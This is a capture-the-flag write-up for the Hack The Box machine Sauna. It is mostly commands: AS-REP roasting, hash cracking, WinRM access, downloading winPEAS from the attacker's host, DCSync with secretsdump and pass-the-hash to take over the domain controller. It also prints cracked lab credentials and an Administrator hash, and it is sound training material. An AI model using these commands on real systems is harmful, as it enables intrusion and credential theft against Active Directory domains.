[HTB] Sauna Writeup
TL;DR
Employee names exposed on the target's web page were converted into likely AD username formats. AS-REP Roasting with the generated username list returned the AS-REP hash for fsmith; cracking it recovered the password Thestrokes23, which gave WinRM access as fsmith.
Local privilege escalation enumeration as fsmith revealed AutoLogon credentials for svc_loanmgr. That account held domain replication rights, so a DCSync attack was possible: the Administrator NTLM hash was dumped with secretsdump.py and used for Pass-the-Hash authentication over WinRM, giving an Administrator shell on the Domain Controller.
1. Recon
The Nmap scan showed that the target was a Windows Active Directory Domain Controller: DNS, Kerberos, LDAP, SMB and WinRM were all exposed.
2. Initial Access - AS-REP Roasting
The target's web page listed employee names on its About page.
http://10.129.95.180/about.html
The discovered names were saved into member.txt.
└─$ cat member.txt
Fergus Smith
Shaun Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb
Since Active Directory environments commonly use predictable username conventions, the full names were converted into the first initial + last name format (Fergus Smith becomes fsmith).
└─$ cat member_format.txt
fsmith
scoins
sdriver
btaylor
hbear
skerb
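The conversion above was done by hand for one convention. The following shell function is an added example, not part of the original write-up: it reads "First Last" names from stdin and prints candidates in several common AD username conventions (flast, first.last, firstlast, first, last, lastf, f.last, first_last, last.first), deduplicated, so the same list can be fed to GetNPUsers when the real convention is not yet known. The sample names are the ones from member.txt on this page; the helper names and the output file name are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): generate candidate AD
# usernames from "First Last" names in several common conventions.

# gen_usernames: read "First Last" lines on stdin, print lowercase
# candidate usernames one per line, deduplicated. Lines with fewer than
# two words are skipped. Middle names are ignored (first and last word used).
gen_usernames() {
  awk '
    NF >= 2 {
      f = tolower($1); l = tolower($NF)
      fi = substr(f, 1, 1); li = substr(l, 1, 1)
      print fi l          # fsmith
      print f "." l       # fergus.smith
      print f l           # fergussmith
      print f             # fergus
      print l             # smith
      print l fi          # smithf
      print fi "." l      # f.smith
      print f "_" l       # fergus_smith
      print l "." f       # smith.fergus
    }' | awk '!seen[$0]++'
}

# count_candidates NAMES: number of unique candidates produced for a name list
count_candidates() {
  printf '%s\n' "$1" | gen_usernames | wc -l | tr -d ' '
}

# has_candidate NAMES USER: succeed if USER is among the generated candidates
has_candidate() {
  printf '%s\n' "$1" | gen_usernames | grep -qx "$2"
}

# Constructed sample input: three of the names from member.txt on this page.
sample_names='Fergus Smith
Shaun Coins
Sophie Driver'

# Typical use: write the candidates to a file (assumed name) and point
# impacket-GetNPUsers -usersfile at it, as done later in this write-up.
printf '%s\n' "$sample_names" | gen_usernames > member_candidates.txt
```

Each name yields nine candidates, so the three sample names produce 27 unique entries; a larger candidate list costs little against GetNPUsers, which simply reports KDC_ERR_C_PRINCIPAL_UNKNOWN for names that do not exist.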
This username list was then used for AS-REP Roasting with impacket-GetNPUsers, which requests an AS-REP for each candidate user without pre-authentication. The KDC only answers for accounts that have "Do not require Kerberos preauthentication" set, and that answer contains a ticket-granting ticket portion encrypted with the user's password-derived key, which can be attacked offline.
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.95.180 -usersfile member_format.txt -outputfile asreproast.hash
The AS-REP hash for fsmith was successfully obtained, so that account has pre-authentication disabled.
The recovered hash was cracked using hashcat in mode 18200 (Kerberos 5 AS-REP etype 23) with the rockyou.txt wordlist.
└─$ hashcat -m 18200 -a 0 asreproast.hash /usr/share/wordlists/rockyou.txt
fsmith:Thestrokes23
The recovered credential was used to authenticate to the target through WinRM.
└─$ evil-winrm -i 10.129.95.180 -u 'fsmith' -p 'Thestrokes23'
3. Privilege Escalation - AutoLogon Credentials to DCSync
After initial access was obtained as fsmith, local privilege escalation enumeration was performed using winPEAS, uploaded from the attacking machine over HTTP.
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-WebRequest -Uri http://10.10.14.55/winPEASx64.exe -OutFile C:\Users\FSmith\Documents\winPEASx64.exe
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\winPEASx64.exe
winPEAS identified AutoLogon credentials stored in the registry (the DefaultUserName and DefaultPassword values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon), which any local user can read.
svc_loanmanager:Moneymakestheworldgoround!
The AutoLogon entry names the user svc_loanmanager, but the matching domain account is svc_loanmgr, and the password was valid for it.
BloodHound showed that svc_loanmgr held the following rights on the domain object.
GetChanges
GetChangesAll
These are the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Together they let an account request directory replication from the Domain Controller, including password hashes, which is exactly what a DCSync attack does.
Using the svc_loanmgr credentials, the NTDS secrets were dumped remotely with secretsdump.py.
└─$ impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
The Administrator NTLM hash was recovered from the dump.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
The recovered NTLM hash was then used for Pass-the-Hash authentication through WinRM. Evil-WinRM's -H option takes only the NT hash, the second half of the LM:NT pair in the secretsdump output.
└─$ evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e